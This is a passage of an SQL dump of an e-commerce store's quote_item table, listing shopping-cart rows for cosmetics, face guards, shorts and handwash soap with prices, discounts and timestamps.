(214, 553, '2026-02-26 03:17:11', '2026-02-26 03:17:11', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 20.0000, 10.8000, 10.8000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(215, 553, '2026-02-26 03:17:15', '2026-02-26 03:17:15', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2,3', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 20.0000, 22.2000, 22.2000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(216, 553, '2026-02-26 03:17:29', '2026-02-26 03:17:29', 2053, 1, NULL, 0, 'WSH12-32-Red', 'Erika Running Short', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 45.0000, 45.0000, NULL, 20.0000, 9.0000, 9.0000, 0.0000, 0.0000, 0.0000, 45.0000, 45.0000, 0.0000, 0.0000, 'configurable', NULL, NULL, NULL, NULL, NULL, 45.0000, 45.0000, 45.0000, 45.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(217, 553, '2026-02-26 03:17:29', '2026-02-26 03:17:29', 2052, 1, 216, 0, 'WSH12-32-Red', 'Erika Running Short-32-Red', NULL, NULL, NULL, 0, 0, 1.0000, 1.0000, 45.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(218, 565, '2026-03-16 08:49:56', '2026-03-16 08:49:56', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(219, 566, '2026-03-16 09:36:26', '2026-03-16 09:36:26', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(220, 603, '2026-03-25 00:22:57', '2026-03-25 00:22:57', 2063, 1, NULL, 0, 'Ramy Mesta Guard Face', 'Ramy Mesta Guard Face', NULL, '2,3', NULL, 0, 0, NULL, 1.0000, 643.0000, 643.0000, NULL, 20.0000, 128.6000, 128.6000, 0.0000, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 643.0000, 643.0000, 643.0000, 643.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(221, 624, '2026-03-25 20:46:57', '2026-03-25 20:46:57', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(222, 625, '2026-03-25 20:54:33', '2026-03-25 20:54:33', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(223, 626, '2026-03-25 22:25:37', '2026-03-25 22:25:37', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(224, 627, '2026-03-26 00:59:23', '2026-03-26 00:59:23', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(225, 629, '2026-03-26 04:11:35', '2026-03-26 04:11:35', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(226, 630, '2026-03-26 07:20:42', '2026-03-26 07:20:42', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(227, 631, '2026-03-26 11:06:32', '2026-03-26 11:06:32', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(228, 633, '2026-03-26 15:38:37', '2026-03-26 15:38:37', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(229, 636, '2026-03-26 19:50:01', '2026-03-26 19:50:01', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(230, 638, '2026-03-27 00:23:41', '2026-03-27 00:23:41', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(231, 640, '2026-03-27 05:13:20', '2026-03-27 05:13:20', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(232, 646, '2026-03-27 10:04:31', '2026-03-27 10:04:31', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(233, 649, '2026-03-27 15:03:06', '2026-03-27 15:03:06', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(234, 674, '2026-03-27 18:21:28', '2026-03-27 18:21:28', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(235, 654, '2026-03-27 18:21:29', '2026-03-27 18:21:29', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(236, 675, '2026-03-27 18:21:31', '2026-03-27 18:21:31', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL);
INSERT INTO `quote_item` (`item_id`, `quote_id`, `created_at`, `updated_at`, `product_id`, `store_id`, `parent_item_id`, `is_virtual`, `sku`, `name`, `description`, `applied_rule_ids`, `additional_data`, `is_qty_decimal`, `no_discount`, `weight`, `qty`, `price`, `base_price`, `custom_price`, `discount_percent`, `discount_amount`, `base_discount_amount`, `tax_percent`, `tax_amount`, `base_tax_amount`, `row_total`, `base_row_total`, `row_total_with_discount`, `row_weight`, `product_type`, `base_tax_before_discount`, `tax_before_discount`, `original_custom_price`, `redirect_url`, `base_cost`, `price_incl_tax`, `base_price_incl_tax`, `row_total_incl_tax`, `base_row_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `gift_message_id`, `free_shipping`, `weee_tax_applied`, `weee_tax_applied_amount`, `weee_tax_applied_row_amount`, `weee_tax_disposition`, `weee_tax_row_disposition`, `base_weee_tax_applied_amount`, `base_weee_tax_applied_row_amnt`, `base_weee_tax_disposition`, `base_weee_tax_row_disposition`) VALUES
(237, 676, '2026-03-27 18:21:33', '2026-03-27 18:21:33', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(238, 677, '2026-03-27 18:21:36', '2026-03-27 18:21:36', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(239, 678, '2026-03-27 18:21:38', '2026-03-27 18:21:38', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(240, 679, '2026-03-27 18:21:40', '2026-03-27 18:21:40', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(241, 681, '2026-03-27 20:11:36', '2026-03-27 20:11:36', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(242, 689, '2026-03-28 01:12:20', '2026-03-28 01:12:20', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(243, 691, '2026-03-28 06:26:49', '2026-03-28 06:26:49', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(244, 709, '2026-03-28 11:47:24', '2026-03-28 11:47:24', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(245, 730, '2026-03-28 15:41:13', '2026-03-28 15:41:13', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(246, 710, '2026-03-28 15:41:14', '2026-03-28 15:41:14', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(247, 731, '2026-03-28 15:41:17', '2026-03-28 15:41:17', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(248, 732, '2026-03-28 15:41:20', '2026-03-28 15:41:20', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(249, 733, '2026-03-28 15:41:22', '2026-03-28 15:41:22', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(250, 734, '2026-03-28 15:41:25', '2026-03-28 15:41:25', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(251, 735, '2026-03-28 15:41:27', '2026-03-28 15:41:27', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(252, 737, '2026-03-28 17:45:32', '2026-03-28 17:45:32', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(253, 738, '2026-03-28 23:50:11', '2026-03-28 23:50:11', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(254, 740, '2026-03-29 05:22:04', '2026-03-29 05:22:04', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(255, 742, '2026-03-29 11:17:11', '2026-03-29 11:17:11', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(256, 743, '2026-03-29 11:42:02', '2026-03-29 11:42:02', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(257, 756, '2026-03-29 11:42:07', '2026-03-29 11:42:07', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(258, 757, '2026-03-29 11:42:13', '2026-03-29 11:42:13', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(259, 758, '2026-03-29 11:42:18', '2026-03-29 11:42:18', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(260, 759, '2026-03-29 11:42:23', '2026-03-29 11:42:23', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(261, 760, '2026-03-29 11:42:28', '2026-03-29 11:42:28', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(262, 762, '2026-03-29 18:29:34', '2026-03-29 18:29:34', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(263, 763, '2026-03-29 20:35:32', '2026-03-29 20:35:32', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(264, 776, '2026-03-29 20:35:37', '2026-03-29 20:35:37', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
